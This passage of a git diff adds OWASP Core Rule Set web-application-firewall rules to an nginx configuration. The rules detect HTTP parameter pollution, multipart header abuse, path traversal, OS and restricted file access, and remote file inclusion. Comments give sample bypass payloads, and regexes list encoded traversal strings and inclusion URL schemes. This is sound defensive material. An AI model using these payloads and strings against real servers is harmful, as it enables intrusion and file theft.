by disallowing arbitrary strings after an array has +# been closed or inbetween the square brackets in multidimensional arrays. +# Please note that rule 921210 allows for 2-dimensional, but not for higher dimensional +# arrays. If these are flagged as attacks, a rule exclusion will have to be +# deployed; ideally for the parameter(s) in question. +# +# [ References ] +# Private bug bounty in Spring 2022, findings Z05OZUCH. +# +# [ Payloads ] +# * foo[1]a=bar&foo[1]b= - parameter parsers often cut after the closing of +# the array. 921180 PL3 takes the full name, though. +# This impediance mismatch allows for bypasses. +# * foo[1]x[1]=bar&foo[1]x[2]= - extension of 1; this has the advantage that +# the parameter name does end with "]" just like a valid array notation. +# +SecRule ARGS_NAMES "@rx (][^\]]+$|][^\]]+\[)" \ + "id:921210,\ + phase:2,\ + pass,\ + log,\ + msg:'HTTP Parameter Pollution after detecting bogus char after parameter array',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/137/15/460',\ + tag:'paranoia-level/3',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:921017,phase:1,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:921018,phase:2,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" +# +# -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) +# + +# -=[ HTTP Parameter Pollution ]=- +# +# [ Rule Logic ] +# Parameter pollution rule 921180 PL3 and 921210 PL3 can by bypassed if a +# weak backend parameter parser ignores parameter array alltogether at +# cuts parameter names at the first occurrence of the "[" character. +# The rule 921220 PL4 prevents this by disallowing parameter array names. +# +# If an application needs parameter array names, then this rule should be +# disabled, ideally by issueing a rule exclusion for the parameter names +# that need it. +# +# [ References ] +# Private bug bounty in Spring 2022, finding 5UXE4RK0. +# +# [ Payloads ] +# * foo[1]=bar&foo[2]= +# * foo=bar&foo[1]= +# * foo[1]=bar&foo[1]acb]= - this is an edge case that 921210 PL3 is not +# able to catch since the parameter name ends with "]". +# +SecRule ARGS_NAMES "@rx \[" \ + "id:921220,\ + phase:2,\ + pass,\ + log,\ + msg:'HTTP Parameter Pollution possible via array notation',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/137/15/460',\ + tag:'paranoia-level/4',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'" + + + +# +# -= Paranoia Levels Finished =- +# +SecMarker "END-REQUEST-921-PROTOCOL-ATTACK" diff --git a/nginx/config/owasp-crs/rules/REQUEST-922-MULTIPART-ATTACK.conf b/nginx/config/owasp-crs/rules/REQUEST-922-MULTIPART-ATTACK.conf new file mode 100644 index 00000000..34500453 --- /dev/null +++ b/nginx/config/owasp-crs/rules/REQUEST-922-MULTIPART-ATTACK.conf @@ -0,0 +1,92 @@ +# ------------------------------------------------------------------------ +# OWASP ModSecurity Core Rule Set ver.4.0.0-rc2 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. +# +# The OWASP ModSecurity Core Rule Set is distributed under +# Apache Software License (ASL) version 2 +# Please see the enclosed LICENSE file for full details. +# ------------------------------------------------------------------------ + +# +# -= Paranoia Level 0 (empty) =- (apply unconditionally) +# + +# This file is to address the 3UWMWA6W vulnerability. +# It requires ModSecurity version 2.9.6 or 3.0.8 (or an updated version with backports +# of the security fixes in these versions) or a compatible engine supporting these changes. +# +# If you cannot upgrade ModSecurity, this file will cause ModSecurity to fail to start. +# In that case, you can temporarily delete this file. However, you will be missing +# protection from these rules. Therefore, we recommend upgrading your engine instead. + +# The rules in this file will be part of the 920 / 921 in the future. + +# Only allow specific charsets when using "_charset_" +# Note: this is in phase:2 because these are headers that come in the body +SecRule &MULTIPART_PART_HEADERS:_charset_ "!@eq 0" \ + "id:922100,\ + phase:2,\ + block,\ + t:none,\ + msg:'Multipart content type global _charset_ definition is not allowed by policy',\ + logdata:'Matched Data: %{ARGS._charset_}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-multipart-header',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153',\ + tag:'paranoia-level/1',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + chain" + SecRule ARGS:_charset_ "!@within |%{tx.allowed_request_content_type_charset}|" \ + "t:lowercase,\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# Only allow specific charsets same as Rule 920600 +# Note: this is in phase:2 because these are headers that come in the body +SecRule MULTIPART_PART_HEADERS "@rx ^content-type\s*:\s*(.*)$" \ + "id:922110,\ + phase:2,\ + block,\ + capture,\ + t:none,t:lowercase,\ + msg:'Illegal MIME Multipart Header content-type: charset parameter',\ + logdata:'Matched Data: %{TX.1} found within Content-Type multipart form',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/272/220',\ + tag:'paranoia-level/1',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + chain" + SecRule TX:1 "!@rx ^(?:(?:\*|[^!-\"\(-\),/:-\?\[-\]\{\}]+)/(?:\*|[^!-\"\(-\),/:-\?\[-\]\{\}]+)|\*)(?:[\s\v]*;[\s\v]*(?:charset[\s\v]*=[\s\v]*\"?(?:iso-8859-15?|utf-8|windows-1252)\b\"?|(?:[^\s\v -\"\(-\),/:-\?\[-\]c\{\}]|c(?:[^!-\"\(-\),/:-\?\[-\]h\{\}]|h(?:[^!-\"\(-\),/:-\?\[-\]a\{\}]|a(?:[^!-\"\(-\),/:-\?\[-\]r\{\}]|r(?:[^!-\"\(-\),/:-\?\[-\]s\{\}]|s(?:[^!-\"\(-\),/:-\?\[-\]e\{\}]|e[^!-\"\(-\),/:-\?\[-\]t\{\}]))))))[^!-\"\(-\),/:-\?\[-\]\{\}]*[\s\v]*=[\s\v]*[^!\(-\),/:-\?\[-\]\{\}]+);?)*(?:[\s\v]*,[\s\v]*(?:(?:\*|[^!-\"\(-\),/:-\?\[-\]\{\}]+)/(?:\*|[^!-\"\(-\),/:-\?\[-\]\{\}]+)|\*)(?:[\s\v]*;[\s\v]*(?:charset[\s\v]*=[\s\v]*\"?(?:iso-8859-15?|utf-8|windows-1252)\b\"?|(?:[^\s\v -\"\(-\),/:-\?\[-\]c\{\}]|c(?:[^!-\"\(-\),/:-\?\[-\]h\{\}]|h(?:[^!-\"\(-\),/:-\?\[-\]a\{\}]|a(?:[^!-\"\(-\),/:-\?\[-\]r\{\}]|r(?:[^!-\"\(-\),/:-\?\[-\]s\{\}]|s(?:[^!-\"\(-\),/:-\?\[-\]e\{\}]|e[^!-\"\(-\),/:-\?\[-\]t\{\}]))))))[^!-\"\(-\),/:-\?\[-\]\{\}]*[\s\v]*=[\s\v]*[^!\(-\),/:-\?\[-\]\{\}]+);?)*)*$" \ + "t:lowercase,\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# Content-Transfer-Encoding was deprecated by rfc7578 in 2015 and should not be used (see: https://www.rfc-editor.org/rfc/rfc7578#section-4.7) +# Note: this is in phase:2 because these are headers that come in the body +SecRule MULTIPART_PART_HEADERS "@rx content-transfer-encoding:(.*)" \ + "id:922120,\ + phase:2,\ + block,\ + capture,\ + t:none,t:lowercase,\ + msg:'Content-Transfer-Encoding was deprecated by rfc7578 in 2015 and should not be used',\ + logdata:'Matched Data: %{TX.0}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-deprecated-header',\ + tag:'OWASP_CRS',\ + tag:'capec/272/220',\ + tag:'paranoia-level/1',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" diff --git a/nginx/config/owasp-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf b/nginx/config/owasp-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf new file mode 100644 index 00000000..097e7f54 --- /dev/null +++ b/nginx/config/owasp-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf @@ -0,0 +1,203 @@ +# ------------------------------------------------------------------------ +# OWASP ModSecurity Core Rule Set ver.4.0.0-rc2 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. +# +# The OWASP ModSecurity Core Rule Set is distributed under +# Apache Software License (ASL) version 2 +# Please see the enclosed LICENSE file for full details. +# ------------------------------------------------------------------------ + +# +# -= Paranoia Level 0 (empty) =- (apply unconditionally) +# + + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:930011,phase:1,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:930012,phase:2,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" +# +# -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) +# + +# +# -=[ Directory Traversal Attacks ]=- +# +# Ref: https://github.com/wireghoul/dotdotpwn +# +# [ Encoded /../ Payloads ] +# +# Regular expression generated from regex-assembly/930100.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 930100 +# +SecRule REQUEST_URI_RAW|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|FILES|XML:/* "@rx (?i)(?:[/\x5c]|%(?:2(?:f|5(?:2f|5c|c(?:1%259c|0%25af))|%46)|5c|c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|(?:bg%q|(?:e|f(?:8%8)?0%8)0%80%a)f|u(?:221[5-6]|EFC8|F025|002f)|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|1u)|0x(?:2f|5c))(?:\.(?:%0[0-1]|\?)?|\?\.?|%(?:2(?:(?:5(?:2|c0%25a))?e|%45)|c0(?:\.|%[25-6ae-f]e)|u(?:(?:ff0|002)e|2024)|%32(?:%(?:%6|4)5|E)|(?:e|f(?:(?:8|c%80)%8)?0%8)0%80%ae)|0x2e){2,3}(?:[/\x5c]|%(?:2(?:f|5(?:2f|5c|c(?:1%259c|0%25af))|%46)|5c|c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|(?:bg%q|(?:e|f(?:8%8)?0%8)0%80%a)f|u(?:221[5-6]|EFC8|F025|002f)|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|1u)|0x(?:2f|5c))" \ + "id:930100,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Path Traversal Attack (/../) or (/.../)',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-lfi',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153/126',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ + setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}'" + +# +# [ Decoded /../ or /..;/ Payloads ] +# +# To prevent '..' from triggering, the regexp is split into two parts: +# - ../ +# - /.. +# OR +# - .../ +# - /... +# +# Semicolon added to prevent path traversal via reverse proxy mapping '/..;/' (Tomcat) +# +SecRule REQUEST_URI|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|FILES|XML:/* "@rx (?:(?:^|[\x5c/;])\.{2,3}[\x5c/;]|[\x5c/;]\.{2,3}(?:[\x5c/;]|$))" \ + "id:930110,\ + phase:2,\ + block,\ + capture,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:removeNulls,t:cmdLine,\ + msg:'Path Traversal Attack (/../) or (/.../)',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-lfi',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153/126',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + multiMatch,\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ + setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}'" + +# +# -=[ OS File Access ]=- +# +# We check for OS file access with the help of a local file with OS files data. +# +# Ref: https://github.com/lightos/Panoptic/blob/master/cases.xml +# +# If you wonder where support for Google OAuth2 has gone, see: +# https://github.com/coreruleset/google-oauth2-plugin +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pmFromFile lfi-os-files.data" \ + "id:930120,\ + phase:2,\ + block,\ + capture,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:normalizePathWin,\ + msg:'OS File Access Attempt',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-lfi',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153/126',\ + tag:'PCI/6.5.4',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# -=[ Restricted File Access ]=- +# +# Detects attempts to retrieve application source code, metadata, +# credentials and version control history possibly reachable in a web root. +# +SecRule REQUEST_FILENAME "@pmFromFile restricted-files.data" \ + "id:930130,\ + phase:1,\ + block,\ + capture,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:normalizePathWin,\ + msg:'Restricted File Access Attempt',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-lfi',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153/126',\ + tag:'PCI/6.5.4',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:930013,phase:1,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:930014,phase:2,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" +# +# -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) +# + +# +# -=[ OS File Access ]=- +# +# This is a stricter sibling of rule 930120. +# This stricter sibling checks for OS file data in request headers referer and user-agent. +# We check for OS file access with the help of a local file with OS files data. +# +# Ref: https://github.com/lightos/Panoptic/blob/master/cases.xml +# +SecRule REQUEST_HEADERS:Referer|REQUEST_HEADERS:User-Agent "@pmFromFile lfi-os-files.data" \ + "id:930121,\ + phase:1,\ + block,\ + capture,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:normalizePathWin,\ + msg:'OS File Access Attempt in REQUEST_HEADERS',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-lfi',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153/126',\ + tag:'PCI/6.5.4',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:930015,phase:1,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:930016,phase:2,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" +# +# -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) +# + + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:930017,phase:1,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:930018,phase:2,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" +# +# -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) +# + + + +# +# -= Paranoia Levels Finished =- +# +SecMarker "END-REQUEST-930-APPLICATION-ATTACK-LFI" diff --git a/nginx/config/owasp-crs/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf b/nginx/config/owasp-crs/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf new file mode 100644 index 00000000..80d77d22 --- /dev/null +++ b/nginx/config/owasp-crs/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf @@ -0,0 +1,189 @@ +# ------------------------------------------------------------------------ +# OWASP ModSecurity Core Rule Set ver.4.0.0-rc2 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. +# +# The OWASP ModSecurity Core Rule Set is distributed under +# Apache Software License (ASL) version 2 +# Please see the enclosed LICENSE file for full details. +# ------------------------------------------------------------------------ +# +# RFI Attacks +# + +# +# -= Paranoia Level 0 (empty) =- (apply unconditionally) +# + + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:931011,phase:1,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:931012,phase:2,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +# +# -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) +# + +# -=[ Rule Logic ]=- +# These rules look for common types of Remote File Inclusion (RFI) attack methods. +# - URL Contains an IP Address +# - The PHP "include()" Function +# - RFI Data Ends with Question Mark(s) (?) +# - RFI Host Doesn't Match Local Host +# +# -=[ References ]=- +# http://projects.webappsec.org/Remote-File-Inclusion +# http://tacticalwebappsec.blogspot.com/2009/06/generic-remote-file-inclusion-attack.html +# +SecRule ARGS "@rx ^(?i:file|ftps?|https?)://(?:\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})" \ + "id:931100,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-rfi',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/175/253',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +SecRule QUERY_STRING|REQUEST_BODY "@rx (?i)(?:\binclude\s*\([^)]*|mosConfig_absolute_path|_CONF\[path\]|_SERVER\[DOCUMENT_ROOT\]|GALLERY_BASEDIR|path\[docroot\]|appserv_root|config\[root_dir\])=(?:file|ftps?|https?)://" \ + "id:931110,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,\ + msg:'Possible Remote File Inclusion (RFI) Attack: Common RFI Vulnerable Parameter Name used w/URL Payload',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-rfi',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/175/253',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +SecRule ARGS "@rx ^(?i:file|ftps?|https?).*?\?+$" \ + "id:931120,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Possible Remote File Inclusion (RFI) Attack: URL Payload Used w/Trailing Question Mark Character (?)',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-rfi',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/175/253',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:931013,phase:1,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:931014,phase:2,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +# +# -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) +# + +# url:file:// can be used by Java applications using +# org.apache.commons.io.IOUtils to access internal files, so this has been added +# +# This rule has one (stricter) sibling: 931131. +# That rule applies the same regular expression to the request filename in phase 1. +# +# Regular expression generated from regex-assembly/931130.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 931130 +# +SecRule ARGS "@rx (?i)(?:(?:url|jar):)?(?:a(?:cap|f[ps]|ttachment)|b(?:eshare|itcoin|lob)|c(?:a(?:llto|p)|id|vs|ompress.(?:zlib|bzip2))|d(?:a(?:v|ta)|ict|n(?:s|tp))|e(?:d2k|xpect)|f(?:(?:ee)?d|i(?:le|nger|sh)|tps?)|g(?:it|o(?:pher)?|lob)|h(?:323|ttps?)|i(?:ax|cap|(?:ma|p)ps?|rc[6s]?)|ja(?:bbe)?r|l(?:dap[is]?|ocal_file)|m(?:a(?:ilto|ven)|ms|umble)|n(?:e(?:tdoc|ws)|fs|ntps?)|ogg|p(?:aparazzi|h(?:ar|p)|op(?:2|3s?)|r(?:es|oxy)|syc)|r(?:mi|sync|tm(?:f?p)?|ar)|s(?:3|ftp|ips?|m(?:[bs]|tps?)|n(?:ews|mp)|sh(?:2(?:.(?:s(?:hell|(?:ft|c)p)|exec|tunnel))?)?|vn(?:\+ssh)?)|t(?:e(?:amspeak|lnet)|ftp|urns?)|u(?:dp|nreal|t2004)|v(?:entrilo|iew-source|nc)|w(?:ebcal|ss?)|x(?:mpp|ri)|zip)://(?:[^@]+@)?([^/]*)" \ + "id:931130,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-rfi',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/175/253',\ + tag:'paranoia-level/2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rfi_parameter_%{MATCHED_VAR_NAME}=.%{tx.1}',\ + chain" + SecRule TX:/rfi_parameter_.*/ "!@endsWith .%{request_headers.host}" \ + "setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +# This is a (stricter) sibling of 931130. +# +# Regular expression generated from regex-assembly/931131.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 931131 +# +SecRule REQUEST_FILENAME "@rx (?i)(?:(?:url|jar):)?(?:a(?:cap|f[ps]|ttachment)|b(?:eshare|itcoin|lob)|c(?:a(?:llto|p)|id|vs|ompress.(?:zlib|bzip2))|d(?:a(?:v|ta)|ict|n(?:s|tp))|e(?:d2k|xpect)|f(?:(?:ee)?d|i(?:le|nger|sh)|tps?)|g(?:it|o(?:pher)?|lob)|h(?:323|ttps?)|i(?:ax|cap|(?:ma|p)ps?|rc[6s]?)|ja(?:bbe)?r|l(?:dap[is]?|ocal_file)|m(?:a(?:ilto|ven)|ms|umble)|n(?:e(?:tdoc|ws)|fs|ntps?)|ogg|p(?:aparazzi|h(?:ar|p)|op(?:2|3s?)|r(?:es|oxy)|syc)|r(?:mi|sync|tm(?:f?p)?|ar)|s(?:3|ftp|ips?|m(?:[bs]|tps?)|n(?:ews|mp)|sh(?:2(?:.(?:s(?:hell|(?:ft|c)p)|exec|tunnel))?)?|vn(?:\+ssh)?)|t(?:e(?:amspeak|lnet)|ftp|urns?)|u(?:dp|nreal|t2004)|v(?:entrilo|iew-source|nc)|w(?:ebcal|ss?)|x(?:mpp|ri)|zip)://(?:[^@]+@)?([^/]*)" \ + "id:931131,\ + phase:1,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,\ + msg:'Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-rfi',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/175/253',\ + tag:'paranoia-level/2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rfi_parameter_%{MATCHED_VAR_NAME}=.%{tx.1}',\ + chain" + SecRule TX:/rfi_parameter_.*/ "!@endsWith .%{request_headers.host}" \ + "setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:931015,phase:1,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:931016,phase:2,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +# +# -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) +# + + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:931017,phase:1,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:931018,phase:2,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +# +# -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) +# + + + +# +# -= Paranoia Levels Finished =- +# +SecMarker "END-REQUEST-931-APPLICATION-ATTACK-RFI" diff --git a/nginx/config/owasp-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf b/nginx/config/owasp-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf new file mode 100644 index 00000000..ee56abe1 --- /dev/null +++ b/nginx/config/owasp-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf @@ -0,0 +1,1826 @@ +# ------------------------------------------------------------------------ +# OWASP ModSecurity Core Rule Set ver.4.0.0-rc2 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. +# +# The OWASP ModSecurity Core Rule Set is distributed under +# Apache Software License (ASL) version 2 +# Please see the enclosed LICENSE file for full details. +# ------------------------------------------------------------------------ + +# +# -= Paranoia Level 0 (empty) =- (apply unconditionally) +# + + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:932011,phase:1,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:932012,phase:2,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +# +# -= Paranoia 